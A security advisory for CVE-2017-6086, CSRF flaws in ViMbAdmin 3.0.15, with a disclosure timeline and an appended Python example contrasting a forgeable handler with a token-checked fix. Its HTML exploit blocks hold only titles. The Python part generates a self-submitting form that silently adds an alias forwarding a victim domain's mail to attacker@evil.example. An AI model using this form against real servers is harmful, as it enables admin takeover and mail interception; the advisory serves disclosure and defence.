# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15

## Product Description

ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU GPL license version 3. The official web site is http://www.vimbadmin.net and the source code of the application is available on GitHub at https://github.com/opensolutions.

## Details

**CVE ID**: CVE-2017-6086

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-352 (Cross-Site Request Forgery)

**CVSS Base Score**: 8.8

**CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

## Proof of concept

Every state-changing request below is accepted on the strength of the administrator's session cookie alone, with no anti-CSRF token or origin check, so a page under the attacker's control can trigger it from the victim's browser. Each proof of concept therefore needs to be visited by an administrator who is logged in to the targeted ViMbAdmin application.

### Add administrator user

#### Exploit

The following HTML/JavaScript code allows an attacker to add an administrator user. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.

```html
CSRF ViMbAdmin
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `/application/controllers/DomainController.php` file.

### Remove administrator user

#### Exploit

The following HTML/JavaScript code allows an attacker to delete an administrator user. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.

```html
CSRF ViMbAdmin
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `/application/controllers/DomainController.php` file.

### Change administrator password

#### Exploit

The following HTML/JavaScript code allows an attacker to change an administrator's password. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.

```html
CSRF ViMbAdmin
```

#### Vulnerable code

The vulnerable code is located in the `passwordAction()` method of the `/application/controllers/DomainController.php` file.

### Add mailbox address

#### Exploit

The following HTML/JavaScript code allows an attacker to add a mailbox address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.

```html
CSRF ViMbAdmin
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `/application/controllers/MailboxController.php` file.

### Purge mailbox

#### Exploit

The following HTML/JavaScript code allows an attacker to remove a mailbox address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.

```html
CSRF ViMbAdmin
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `/application/controllers/MailboxController.php` file.

### Archive mailbox

#### Exploit

The following HTML/JavaScript code allows an attacker to force the archival of a mailbox address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.

```html
CSRF ViMbAdmin
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `/application/controllers/ArchiveController.php` file.

### Add alias address

#### Exploit

The following HTML/JavaScript code allows an attacker to add an alias address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application. The equivalent request, as a curl command (host, domain id and field values omitted), is shown first.

```html
curl 'http:///alias/add/did/' --data 'local_part=&domain=&goto%5B%5D='
CSRF ViMbAdmin
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `/application/controllers/AliasController.php` file.

### Remove alias address

#### Exploit

The following HTML/JavaScript code allows an attacker to remove an alias address. It needs to be visited by a logged-in administrator of the targeted ViMbAdmin application.

```html
CSRF ViMbAdmin
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `/application/controllers/AliasController.php` file.

## Affected version

* tested on version 3.0.15

## Timeline (dd/mm/yyyy)

* 22/01/2017 : Initial discovery.
* 16/02/2017 : First contact with opensolutions.io.
* 16/02/2017 : Advisory sent.
* 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
* 13/03/2017 : Sysdream Labs requests an update.
* 29/03/2017 : Second request for an update.
* 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
* 03/05/2017 : Full disclosure.

## Credits

* Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)

Iranian Exploit DataBase = http://IeDb.Ir [2017-05-12]
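Closing worked example. The Python model below is added for this page; it is neither ViMbAdmin code nor part of the Sysdream advisory, and no upstream fix existed at disclosure time. The attacker half turns the documented POST to `alias/add/did/<id>` (fields `local_part`, `domain` and `goto[]`, the names given in the curl line of the "Add alias address" section) into the kind of self-submitting form the advisory's HTML/JavaScript PoCs consist of; the host `vimbadmin.example`, the domain id `1`, the field values and the session layout are all assumed placeholders. The server half contrasts a handler that trusts the session cookie alone, which is the reported behaviour, with the same handler guarded by a per-session synchronizer token, the standard remediation for CWE-352: the token lives in the session and in the legitimate form, and a cross-origin page cannot read it, so a forged request never carries it.

```python
"""CSRF on a state-changing POST: forged request vs. token-checked handler.

Added example, not ViMbAdmin code. Endpoint and field names come from the
advisory's curl line; host, domain id, values and session layout are assumed.
"""
import hmac
import html
import secrets


# ---------------------------------------------------------------------------
# Attacker side: the self-submitting form a victim admin's browser will POST.
# ---------------------------------------------------------------------------

def _esc(s):
    return html.escape(s, quote=True)


def csrf_form(action_url, fields):
    """Render a page that POSTs `fields` to `action_url` as soon as it loads.

    `fields` is a list of (name, value) pairs so a repeated name such as
    goto[] (a PHP array parameter) can carry several values.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{_esc(n)}" value="{_esc(v)}">'
        for n, v in fields
    )
    return (
        "<html><body>\n"
        f'  <form id="f" method="POST" action="{_esc(action_url)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        '  <script>document.getElementById("f").submit();</script>\n'
        "</body></html>\n"
    )


# ---------------------------------------------------------------------------
# Server side: toy model of an alias/add handler (assumed session layout).
# ---------------------------------------------------------------------------

class Forbidden(Exception):
    pass


def new_session():
    """A logged-in admin's session; the random token is what a fix adds."""
    return {"admin": "admin@example.com", "csrf": secrets.token_urlsafe(32)}


def add_alias_vulnerable(session, form, aliases):
    """Reported behaviour: the session cookie is the only check, so any POST
    the browser attaches the cookie to is accepted, whoever authored it."""
    if not session.get("admin"):
        raise Forbidden("not logged in")
    aliases.append((form["local_part"], form["domain"], form["goto[]"]))


def add_alias_hardened(session, form, aliases):
    """Synchronizer-token pattern: the form must echo the per-session secret,
    which the same-origin policy keeps out of an attacker's page."""
    if not session.get("admin"):
        raise Forbidden("not logged in")
    expected = session.get("csrf", "")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison; a missing, empty or wrong-length token fails.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        raise Forbidden("bad CSRF token")
    aliases.append((form["local_part"], form["domain"], form["goto[]"]))


def simulate(handler):
    """Deliver a forged POST (cookie attached, no token) and then a legitimate
    one; return (forged_accepted, legitimate_accepted)."""
    session = new_session()
    aliases = []
    forged = {"local_part": "billing", "domain": "victim.example",   # constructed
              "goto[]": "attacker@evil.example"}
    legit = dict(forged, csrf_token=session["csrf"])
    outcome = []
    for form in (forged, legit):
        try:
            handler(session, form, aliases)
            outcome.append(True)
        except Forbidden:
            outcome.append(False)
    return tuple(outcome)


if __name__ == "__main__":
    print(csrf_form("http://vimbadmin.example/alias/add/did/1",
                    [("local_part", "billing"), ("domain", "victim.example"),
                     ("goto[]", "attacker@evil.example")]))
    print("vulnerable:", simulate(add_alias_vulnerable))  # (True, True)
    print("hardened:  ", simulate(add_alias_hardened))    # (False, True)
```

The generated page has to be served from an origin the attacker controls and opened by the victim while logged in, exactly the precondition each PoC section states (CVSS UI:R). Current browsers default cookies to SameSite=Lax, which stops the cross-site top-level POST used here, but that is a browser-side mitigation a 2017-era deployment could not rely on; the token check is the application-side fix and works regardless of cookie policy.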